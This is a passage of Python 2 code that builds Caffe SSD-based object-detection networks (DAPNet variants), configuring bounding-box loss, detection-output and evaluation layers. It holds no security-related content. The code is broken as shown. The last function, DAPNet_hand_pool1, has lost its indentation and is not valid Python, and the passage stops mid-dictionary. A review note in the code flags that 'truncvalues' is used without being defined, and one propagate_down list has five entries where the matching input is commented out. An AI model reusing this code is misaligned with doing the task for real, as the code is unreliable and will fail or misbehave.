            use_batchnorm=ssd_Param_2.get("interlayers_use_batchnorm",True), \
            inter_layer_channels=ssd_Param_2.get("interlayers_channels_kernels",[]), \
            use_focus_loss=ssd_Param_2.get("bboxloss_using_focus_loss",False), \
            use_dense_boxes=ssd_Param_2.get('bboxloss_use_dense_boxes',False), \
            stage=2)
        # make Loss or Detout for SSD2 (mirrors the SSD1 logic above)
        if train:
            loss_param = get_loss_param(normalization=ssd_Param_2.get("bboxloss_normalization",P.Loss.VALID))
            mbox_2_layers.append(net[gt_label])
            use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
            if use_dense_boxes:
                bboxloss_param = {
                    'gt_labels': ssd_Param_2.get('gt_labels',[]),
                    'target_labels': ssd_Param_2.get('target_labels',[]),
                    'num_classes':ssd_Param_2.get("num_classes",2),
                    'alias_id':ssd_Param_2.get("alias_id",0),
                    'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
                    'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
                    'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
                    'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
                    'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
                    'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
                    'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
                    'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
                    'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
                    'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
                    'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
                    'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
                    'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
                    'use_prior_for_matching':True,
                    'encode_variance_in_target': False,
                    'flag_noperson': ssd_Param_2.get('flag_noperson', False),
                }
                net["mbox_2_loss"] = L.DenseBBoxLoss(*mbox_2_layers, dense_bbox_loss_param=bboxloss_param, \
                    loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
                    propagate_down=[True, True, False, False])
            else:
                bboxloss_param = {
                    'gt_labels': ssd_Param_2.get('gt_labels',[]),
                    'target_labels': ssd_Param_2.get('target_labels',[]),
                    'num_classes':ssd_Param_2.get("num_classes",2),
                    'alias_id':ssd_Param_2.get("alias_id",0),
                    'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
                    'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
                    'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
                    'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
                    'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
                    'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
                    'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
                    'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
                    'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
                    'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
                    'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
                    'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
                    'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
                    'match_type':P.MultiBoxLoss.PER_PREDICTION,
                    'share_location':True,
                    'use_prior_for_matching':True,
                    'background_label_id':0,
                    'encode_variance_in_target': False,
                    'map_object_to_agnostic':False,
                }
                net["mbox_2_loss"] = L.BBoxLoss(*mbox_2_layers, bbox_loss_param=bboxloss_param, \
                    loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
                    propagate_down=[True, True, False, False])
        else:
            # TEST mode: conf transform + DetOut for SSD2.
            if ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
                reshape_name = "mbox_2_conf_reshape"
                net[reshape_name] = L.Reshape(mbox_2_layers[1], \
                    shape=dict(dim=[0, -1, ssd_Param_2.get("num_classes",2)]))
                softmax_name = "mbox_2_conf_softmax"
                net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
                flatten_name = "mbox_2_conf_flatten"
                net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
                mbox_2_layers[1] = net[flatten_name]
            elif ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
                sigmoid_name = "mbox_2_conf_sigmoid"
                net[sigmoid_name] = L.Sigmoid(mbox_2_layers[1])
                mbox_2_layers[1] = net[sigmoid_name]
            else:
                raise ValueError("Unknown conf loss type.")
            # Detection-output (NMS) parameters for SSD2.
            det_out_param = {
                'num_classes':ssd_Param_2.get("num_classes",2),
                'target_labels': ssd_Param_2.get('detout_target_labels',[]),
                'alias_id':ssd_Param_2.get("alias_id",0),
                'conf_threshold':ssd_Param_2.get("detout_conf_threshold",0.01),
                'nms_threshold':ssd_Param_2.get("detout_nms_threshold",0.45),
                'size_threshold':ssd_Param_2.get("detout_size_threshold",0.0001),
                'top_k':ssd_Param_2.get("detout_top_k",30),
                'share_location':True,
                'code_type':P.PriorBox.CENTER_SIZE,
                'background_label_id':0,
                'variance_encoded_in_target':False,
            }
            use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
            if use_dense_boxes:
                net.detection_out_2 = L.DenseDetOut(*mbox_2_layers, \
                    detection_output_param=det_out_param, \
                    include=dict(phase=caffe_pb2.Phase.Value('TEST')))
            else:
                net.detection_out_2 = L.DetOut(*mbox_2_layers, \
                    detection_output_param=det_out_param, \
                    include=dict(phase=caffe_pb2.Phase.Value('TEST')))
    # ---------------- EVAL in TEST MODE ----------------
    # Concatenate the branch detection outputs (axis=2 stacks detections)
    # and score them against the ground truth with DetEval.
    if not train:
        det_eval_param = {
            'gt_labels': eval_Param.get('eval_gt_labels',[]),
            'num_classes':eval_Param.get("eval_num_classes",2),
            'evaluate_difficult_gt':eval_Param.get("eval_difficult_gt",False),
            'boxsize_threshold':eval_Param.get("eval_boxsize_threshold",[0,0.01,0.05,0.1,0.15,0.2,0.25]),
            'iou_threshold':eval_Param.get("eval_iou_threshold",[0.9,0.75,0.5]),
            'background_label_id':0,
        }
        if use_ssd2_for_detection:
            det_out_layers = []
            if flag_train_withperson:
                det_out_layers.append(net['detection_out_1'])
            det_out_layers.append(net['detection_out_2'])
            name = 'det_out'
            net[name] = L.Concat(*det_out_layers, axis=2)
            net.det_accu = L.DetEval(net[name], net[gt_label], \
                detection_evaluate_param=det_eval_param, \
                include=dict(phase=caffe_pb2.Phase.Value('TEST')))
        else:
            net.det_accu = L.DetEval(net['detection_out_1'], net[gt_label], \
                detection_evaluate_param=det_eval_param, \
                include=dict(phase=caffe_pb2.Phase.Value('TEST')))
    return net
def DAPNetVGGReduceNoConcat(net, train=True, data_layer="data", gt_label="label", \
                            net_width=512, net_height=288):
    """Build the DAPNet detection graph on a reduced-VGG backbone,
    WITHOUT the multi-scale feature-map concats of DAPNetVGGReduce.

    The SSD headers therefore read directly from the configured
    ``feature_layers`` (pool/conv blobs) instead of featuremap1..3.
    Registers all layers into ``net`` and returns it.

    Args:
        net: Caffe NetSpec-like object supporting ``net[name] = layer``.
        train: if True emit BBox loss layers (TRAIN phase); if False emit
            conf-transform + DetOut layers and DetEval (TEST phase).
        data_layer: name of the input data blob.
        gt_label: name of the ground-truth label blob.
        net_width, net_height: input resolution forwarded to the SSD headers.

    Returns:
        The same ``net`` object with all layers registered.

    Raises:
        ValueError: if the configured conf loss type is neither SOFTMAX
            nor LOGISTIC (test-mode conf transform).

    NOTE(review): depends on module-level configuration and helpers not
    visible here (ssd_Param_1, ssd_Param_2, eval_Param, Conv6_Param,
    flag_train_withperson, use_ssd2_for_detection, and the builder
    helpers). In particular ``truncvalues`` is referenced below but not
    defined in this function — presumably a module-level global; confirm
    it exists before calling.
    """
    # ---------------- BaseNet ----------------
    # Hard-coded switch: False selects the reduced-VGG backbone below.
    flag_use_dark = False
    if flag_use_dark:
        net = YoloNetPart(net, from_layer="data", use_bn=True, use_layers=5, use_sub_layers=5, final_pool=True, lr=1,
                          decay=1)#1.47G, 13.7M
    else:
        # Earlier channel configuration kept for reference:
        # c = ((32,), (32,), (32, 32, 128), (64, 64, 128), (128, 128, 256))#1.74G, 19.43M
        # net = VGG16_BaseNet_ChangeChannel(net, "data", channels=c)
        channels = ((32,), (32,), (64, 32, 128), (128, 64, 128, 64, 256), (256, 128, 256, 128, 256))
        strides = (True, True, True, False, False)
        kernels = ((3,), (3,), (3, 1, 3), (3, 1, 3, 1, 3), (3, 1, 3, 1, 3))
        pool_last = (False,False,False,True,True)
        # NOTE(review): truncvalues is not defined in this scope.
        net = VGG16_BaseNet_ChangeChannel(net, from_layer=data_layer, channels=channels, strides=strides,
                                          kernels=kernels,freeze_layers=[], pool_last=pool_last,use_bn=True,truncvalues=truncvalues)
    # lr multiplier for the person-detection branch (conv6 + SSD1 headers).
    lr_detnetperson = 1.0
    # ---------------- Conv6 on top of pool5 ----------------
    conv6_output = Conv6_Param.get('conv6_output',[])
    conv6_kernal_size = Conv6_Param.get('conv6_kernal_size',[])
    out_layer = "pool5"
    net = addconv6(net, from_layer=out_layer, use_bn=True, conv6_output=conv6_output, \
        conv6_kernal_size=conv6_kernal_size, pre_name="conv6",start_pool=False,lr_mult=lr_detnetperson, decay_mult=1,n_group=1,truncvalues=truncvalues)
    # Debug dump of registered layer names (Python 2 print statement).
    print net.keys()
    # ---------------- SSD1 (person branch, gated by flag_train_withperson) ----------------
    if flag_train_withperson:
        # mbox_1_layers is [loc, conf, priorbox] as produced by SsdDetectorHeaders.
        mbox_1_layers = SsdDetectorHeaders(net, \
            net_width=net_width, net_height=net_height, data_layer=data_layer, \
            from_layers=ssd_Param_1.get('feature_layers',[]), \
            num_classes=ssd_Param_1.get("num_classes",2), \
            boxsizes=ssd_Param_1.get("anchor_boxsizes", []), \
            aspect_ratios=ssd_Param_1.get("anchor_aspect_ratios",[]), \
            prior_variance = ssd_Param_1.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
            flip=ssd_Param_1.get("anchor_flip",True), \
            clip=ssd_Param_1.get("anchor_clip",True), \
            normalizations=ssd_Param_1.get("interlayers_normalizations",[]), \
            use_batchnorm=ssd_Param_1.get("interlayers_use_batchnorm",True), \
            inter_layer_channels=ssd_Param_1.get("interlayers_channels_kernels",[]), \
            use_focus_loss=ssd_Param_1.get("bboxloss_using_focus_loss",False), \
            use_dense_boxes=ssd_Param_1.get('bboxloss_use_dense_boxes',False), \
            stage=1,lr_mult=lr_detnetperson)
        # TRAIN: attach a bbox loss; TEST: transform conf and attach DetOut.
        if train:
            loss_param = get_loss_param(normalization=ssd_Param_1.get("bboxloss_normalization",P.Loss.VALID))
            mbox_1_layers.append(net[gt_label])
            use_dense_boxes = ssd_Param_1.get('bboxloss_use_dense_boxes',False)
            if use_dense_boxes:
                # Dense-box variant: LOGISTIC conf loss by default.
                bboxloss_param = {
                    'gt_labels': ssd_Param_1.get('gt_labels',[]),
                    'target_labels': ssd_Param_1.get('target_labels',[]),
                    'num_classes':ssd_Param_1.get("num_classes",2),
                    'alias_id':ssd_Param_1.get("alias_id",0),
                    'loc_loss_type':ssd_Param_1.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
                    'conf_loss_type':ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
                    'loc_weight':ssd_Param_1.get("bboxloss_loc_weight",1),
                    'conf_weight':ssd_Param_1.get("bboxloss_conf_weight",1),
                    'overlap_threshold':ssd_Param_1.get("bboxloss_overlap_threshold",0.5),
                    'neg_overlap':ssd_Param_1.get("bboxloss_neg_overlap",0.5),
                    'size_threshold':ssd_Param_1.get("bboxloss_size_threshold",0.0001),
                    'do_neg_mining':ssd_Param_1.get("bboxloss_do_neg_mining",True),
                    'neg_pos_ratio':ssd_Param_1.get("bboxloss_neg_pos_ratio",3),
                    'using_focus_loss':ssd_Param_1.get("bboxloss_using_focus_loss",False),
                    'gama':ssd_Param_1.get("bboxloss_focus_gama",2),
                    'use_difficult_gt':ssd_Param_1.get("bboxloss_use_difficult_gt",False),
                    'code_type':ssd_Param_1.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
                    'use_prior_for_matching':True,
                    'encode_variance_in_target': False,
                    'flag_noperson':ssd_Param_1.get('flag_noperson',False),
                }
                # propagate_down: gradients flow to loc/conf only, not priors/labels.
                net["mbox_1_loss"] = L.DenseBBoxLoss(*mbox_1_layers, dense_bbox_loss_param=bboxloss_param, \
                    loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
                    propagate_down=[True, True, False, False])
            else:
                # Standard SSD variant: SOFTMAX conf loss by default.
                bboxloss_param = {
                    'gt_labels': ssd_Param_1.get('gt_labels',[]),
                    'target_labels': ssd_Param_1.get('target_labels',[]),
                    'num_classes':ssd_Param_1.get("num_classes",2),
                    'alias_id':ssd_Param_1.get("alias_id",0),
                    'loc_loss_type':ssd_Param_1.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
                    'conf_loss_type':ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
                    'loc_weight':ssd_Param_1.get("bboxloss_loc_weight",1),
                    'conf_weight':ssd_Param_1.get("bboxloss_conf_weight",1),
                    'overlap_threshold':ssd_Param_1.get("bboxloss_overlap_threshold",0.5),
                    'neg_overlap':ssd_Param_1.get("bboxloss_neg_overlap",0.5),
                    'size_threshold':ssd_Param_1.get("bboxloss_size_threshold",0.0001),
                    'do_neg_mining':ssd_Param_1.get("bboxloss_do_neg_mining",True),
                    'neg_pos_ratio':ssd_Param_1.get("bboxloss_neg_pos_ratio",3),
                    'using_focus_loss':ssd_Param_1.get("bboxloss_using_focus_loss",False),
                    'gama':ssd_Param_1.get("bboxloss_focus_gama",2),
                    'use_difficult_gt':ssd_Param_1.get("bboxloss_use_difficult_gt",False),
                    'code_type':ssd_Param_1.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
                    'match_type':P.MultiBoxLoss.PER_PREDICTION,
                    'share_location':True,
                    'use_prior_for_matching':True,
                    'background_label_id':0,
                    'encode_variance_in_target': False,
                    'map_object_to_agnostic':False,
                }
                net["mbox_1_loss"] = L.BBoxLoss(*mbox_1_layers, bbox_loss_param=bboxloss_param, \
                    loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
                    propagate_down=[True, True, False, False])
        else:
            # TEST mode: convert raw conf logits to probabilities before DetOut.
            if ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
                reshape_name = "mbox_1_conf_reshape"
                net[reshape_name] = L.Reshape(mbox_1_layers[1], \
                    shape=dict(dim=[0, -1, ssd_Param_1.get("num_classes",2)]))
                softmax_name = "mbox_1_conf_softmax"
                net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
                flatten_name = "mbox_1_conf_flatten"
                net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
                mbox_1_layers[1] = net[flatten_name]
            elif ssd_Param_1.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
                sigmoid_name = "mbox_1_conf_sigmoid"
                net[sigmoid_name] = L.Sigmoid(mbox_1_layers[1])
                mbox_1_layers[1] = net[sigmoid_name]
            else:
                raise ValueError("Unknown conf loss type.")
            # Detection-output (NMS) parameters for SSD1.
            det_out_param = {
                'num_classes':ssd_Param_1.get("num_classes",2),
                'target_labels': ssd_Param_1.get('detout_target_labels',[]),
                'alias_id':ssd_Param_1.get("alias_id",0),
                'conf_threshold':ssd_Param_1.get("detout_conf_threshold",0.01),
                'nms_threshold':ssd_Param_1.get("detout_nms_threshold",0.45),
                'size_threshold':ssd_Param_1.get("detout_size_threshold",0.0001),
                'top_k':ssd_Param_1.get("detout_top_k",30),
                'share_location':True,
                'code_type':P.PriorBox.CENTER_SIZE,
                'background_label_id':0,
                'variance_encoded_in_target':False,
            }
            use_dense_boxes = ssd_Param_1.get('bboxloss_use_dense_boxes',False)
            if use_dense_boxes:
                net.detection_out_1 = L.DenseDetOut(*mbox_1_layers, \
                    detection_output_param=det_out_param, \
                    include=dict(phase=caffe_pb2.Phase.Value('TEST')))
            else:
                net.detection_out_1 = L.DetOut(*mbox_1_layers, \
                    detection_output_param=det_out_param, \
                    include=dict(phase=caffe_pb2.Phase.Value('TEST')))
    # ---------------- SSD2 (second detection branch) ----------------
    if use_ssd2_for_detection:
        mbox_2_layers = SsdDetectorHeaders(net, \
            net_width=net_width, net_height=net_height, data_layer=data_layer, \
            from_layers=ssd_Param_2.get('feature_layers',[]), \
            num_classes=ssd_Param_2.get("num_classes",2), \
            boxsizes=ssd_Param_2.get("anchor_boxsizes", []), \
            aspect_ratios=ssd_Param_2.get("anchor_aspect_ratios",[]), \
            prior_variance = ssd_Param_2.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
            flip=ssd_Param_2.get("anchor_flip",True), \
            clip=ssd_Param_2.get("anchor_clip",True), \
            normalizations=ssd_Param_2.get("interlayers_normalizations",[]), \
            use_batchnorm=ssd_Param_2.get("interlayers_use_batchnorm",True), \
            inter_layer_channels=ssd_Param_2.get("interlayers_channels_kernels",[]), \
            use_focus_loss=ssd_Param_2.get("bboxloss_using_focus_loss",False), \
            use_dense_boxes=ssd_Param_2.get('bboxloss_use_dense_boxes',False), \
            stage=2)
        # make Loss or Detout for SSD2 (mirrors the SSD1 logic above)
        if train:
            loss_param = get_loss_param(normalization=ssd_Param_2.get("bboxloss_normalization",P.Loss.VALID))
            mbox_2_layers.append(net[gt_label])
            use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
            if use_dense_boxes:
                bboxloss_param = {
                    'gt_labels': ssd_Param_2.get('gt_labels',[]),
                    'target_labels': ssd_Param_2.get('target_labels',[]),
                    'num_classes':ssd_Param_2.get("num_classes",2),
                    'alias_id':ssd_Param_2.get("alias_id",0),
                    'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
                    'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
                    'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
                    'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
                    'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
                    'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
                    'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
                    'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
                    'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
                    'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
                    'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
                    'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
                    'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
                    'use_prior_for_matching':True,
                    'encode_variance_in_target': False,
                    'flag_noperson': ssd_Param_2.get('flag_noperson', False),
                }
                net["mbox_2_loss"] = L.DenseBBoxLoss(*mbox_2_layers, dense_bbox_loss_param=bboxloss_param, \
                    loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
                    propagate_down=[True, True, False, False])
            else:
                bboxloss_param = {
                    'gt_labels': ssd_Param_2.get('gt_labels',[]),
                    'target_labels': ssd_Param_2.get('target_labels',[]),
                    'num_classes':ssd_Param_2.get("num_classes",2),
                    'alias_id':ssd_Param_2.get("alias_id",0),
                    'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
                    'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
                    'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
                    'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
                    'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
                    'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
                    'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
                    'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
                    'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
                    'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
                    'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
                    'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
                    'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
                    'match_type':P.MultiBoxLoss.PER_PREDICTION,
                    'share_location':True,
                    'use_prior_for_matching':True,
                    'background_label_id':0,
                    'encode_variance_in_target': False,
                    'map_object_to_agnostic':False,
                }
                net["mbox_2_loss"] = L.BBoxLoss(*mbox_2_layers, bbox_loss_param=bboxloss_param, \
                    loss_param=loss_param,include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
                    propagate_down=[True, True, False, False])
        else:
            # TEST mode: conf transform + DetOut for SSD2.
            if ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.SOFTMAX:
                reshape_name = "mbox_2_conf_reshape"
                net[reshape_name] = L.Reshape(mbox_2_layers[1], \
                    shape=dict(dim=[0, -1, ssd_Param_2.get("num_classes",2)]))
                softmax_name = "mbox_2_conf_softmax"
                net[softmax_name] = L.Softmax(net[reshape_name], axis=2)
                flatten_name = "mbox_2_conf_flatten"
                net[flatten_name] = L.Flatten(net[softmax_name], axis=1)
                mbox_2_layers[1] = net[flatten_name]
            elif ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX) == P.MultiBoxLoss.LOGISTIC:
                sigmoid_name = "mbox_2_conf_sigmoid"
                net[sigmoid_name] = L.Sigmoid(mbox_2_layers[1])
                mbox_2_layers[1] = net[sigmoid_name]
            else:
                raise ValueError("Unknown conf loss type.")
            # Detection-output (NMS) parameters for SSD2.
            det_out_param = {
                'num_classes':ssd_Param_2.get("num_classes",2),
                'target_labels': ssd_Param_2.get('detout_target_labels',[]),
                'alias_id':ssd_Param_2.get("alias_id",0),
                'conf_threshold':ssd_Param_2.get("detout_conf_threshold",0.01),
                'nms_threshold':ssd_Param_2.get("detout_nms_threshold",0.45),
                'size_threshold':ssd_Param_2.get("detout_size_threshold",0.0001),
                'top_k':ssd_Param_2.get("detout_top_k",30),
                'share_location':True,
                'code_type':P.PriorBox.CENTER_SIZE,
                'background_label_id':0,
                'variance_encoded_in_target':False,
            }
            use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
            if use_dense_boxes:
                net.detection_out_2 = L.DenseDetOut(*mbox_2_layers, \
                    detection_output_param=det_out_param, \
                    include=dict(phase=caffe_pb2.Phase.Value('TEST')))
            else:
                net.detection_out_2 = L.DetOut(*mbox_2_layers, \
                    detection_output_param=det_out_param, \
                    include=dict(phase=caffe_pb2.Phase.Value('TEST')))
    # ---------------- EVAL in TEST MODE ----------------
    # Concatenate the branch detection outputs (axis=2 stacks detections)
    # and score them against the ground truth with DetEval.
    if not train:
        det_eval_param = {
            'gt_labels': eval_Param.get('eval_gt_labels',[]),
            'num_classes':eval_Param.get("eval_num_classes",2),
            'evaluate_difficult_gt':eval_Param.get("eval_difficult_gt",False),
            'boxsize_threshold':eval_Param.get("eval_boxsize_threshold",[0,0.01,0.05,0.1,0.15,0.2,0.25]),
            'iou_threshold':eval_Param.get("eval_iou_threshold",[0.9,0.75,0.5]),
            'background_label_id':0,
        }
        if use_ssd2_for_detection:
            det_out_layers = []
            if flag_train_withperson:
                det_out_layers.append(net['detection_out_1'])
            det_out_layers.append(net['detection_out_2'])
            name = 'det_out'
            net[name] = L.Concat(*det_out_layers, axis=2)
            net.det_accu = L.DetEval(net[name], net[gt_label], \
                detection_evaluate_param=det_eval_param, \
                include=dict(phase=caffe_pb2.Phase.Value('TEST')))
        else:
            net.det_accu = L.DetEval(net['detection_out_1'], net[gt_label], \
                detection_evaluate_param=det_eval_param, \
                include=dict(phase=caffe_pb2.Phase.Value('TEST')))
    return net
# Final Network
def DAPNet_hand_pool1(net, train=True, data_layer="data", gt_label="label", \
net_width=512, net_height=288):
lr_basenet =0
# BaseNet
use_sub_layers = ()# exmpty means only has conv1 and pooling
num_channels = ()
output_channels = (0, )
channel_scale = 4
add_strs = "_recon"
net = ResidualVariant_Base_A(net, data_layer=data_layer, use_sub_layers=use_sub_layers, num_channels=num_channels,
output_channels=output_channels, channel_scale=channel_scale, lr=lr_basenet, decay=lr_basenet,
add_strs=add_strs)
print net.keys()
# make Loss & Detout for SSD2
mbox_2_layers = SsdDetectorHeaders(net, \
net_width=net_width, net_height=net_height, data_layer=data_layer, \
from_layers=ssd_Param_2.get('feature_layers',[]), \
num_classes=ssd_Param_2.get("num_classes",2), \
boxsizes=ssd_Param_2.get("anchor_boxsizes", []), \
aspect_ratios=ssd_Param_2.get("anchor_aspect_ratios",[]), \
prior_variance = ssd_Param_2.get("anchor_prior_variance",[0.1,0.1,0.2,0.2]), \
flip=ssd_Param_2.get("anchor_flip",True), \
clip=ssd_Param_2.get("anchor_clip",True), \
normalizations=ssd_Param_2.get("interlayers_normalizations",[]), \
use_batchnorm=ssd_Param_2.get("interlayers_use_batchnorm",True), \
inter_layer_channels=ssd_Param_2.get("interlayers_channels_kernels",[]), \
use_focus_loss=ssd_Param_2.get("bboxloss_using_focus_loss",False), \
use_dense_boxes=ssd_Param_2.get('bboxloss_use_dense_boxes',False), \
stage=2)
# make Loss or Detout for SSD1
if train:
loss_param = get_loss_param(normalization=ssd_Param_2.get("bboxloss_normalization",P.Loss.VALID))
mbox_2_layers.append(net[gt_label])
# mbox_2_layers.append(net[data_layer])
use_dense_boxes = ssd_Param_2.get('bboxloss_use_dense_boxes',False)
if use_dense_boxes:
bboxloss_param = {
'gt_labels': ssd_Param_2.get('gt_labels',[]),
'target_labels': ssd_Param_2.get('target_labels',[]),
'num_classes':ssd_Param_2.get("num_classes",2),
'alias_id':ssd_Param_2.get("alias_id",0),
'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.LOGISTIC),
'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
'use_difficult_gt':ssd_Param_2.get("bboxloss_use_difficult_gt",False),
'code_type':ssd_Param_2.get("bboxloss_code_type",P.PriorBox.CENTER_SIZE),
'use_prior_for_matching':True,
'encode_variance_in_target': False,
'flag_noperson': ssd_Param_2.get('flag_noperson', False),
'size_threshold_max':ssd_Param_2.get("bboxloss_size_threshold_max",2),
'flag_showdebug':ssd_Param_2.get("flag_showdebug",False),
'flag_forcematchallgt':ssd_Param_2.get("flag_forcematchallgt",False),
'flag_areamaxcheckinmatch':ssd_Param_2.get("flag_areamaxcheckinmatch",True),
}
net["mbox_2_loss"] = L.DenseBBoxLoss(*mbox_2_layers, dense_bbox_loss_param=bboxloss_param, \
loss_param=loss_param, include=dict(phase=caffe_pb2.Phase.Value('TRAIN')), \
propagate_down=[True, True, False, False,False])
else:
bboxloss_param = {
'gt_labels': ssd_Param_2.get('gt_labels',[]),
'target_labels': ssd_Param_2.get('target_labels',[]),
'num_classes':ssd_Param_2.get("num_classes",2),
'alias_id':ssd_Param_2.get("alias_id",0),
'loc_loss_type':ssd_Param_2.get("bboxloss_loc_loss_type",P.MultiBoxLoss.SMOOTH_L1),
'conf_loss_type':ssd_Param_2.get("bboxloss_conf_loss_type",P.MultiBoxLoss.SOFTMAX),
'loc_weight':ssd_Param_2.get("bboxloss_loc_weight",1),
'conf_weight':ssd_Param_2.get("bboxloss_conf_weight",1),
'overlap_threshold':ssd_Param_2.get("bboxloss_overlap_threshold",0.5),
'neg_overlap':ssd_Param_2.get("bboxloss_neg_overlap",0.5),
'size_threshold':ssd_Param_2.get("bboxloss_size_threshold",0.0001),
'do_neg_mining':ssd_Param_2.get("bboxloss_do_neg_mining",True),
'neg_pos_ratio':ssd_Param_2.get("bboxloss_neg_pos_ratio",3),
'using_focus_loss':ssd_Param_2.get("bboxloss_using_focus_loss",False),
'gama':ssd_Param_2.get("bboxloss_focus_gama",2),
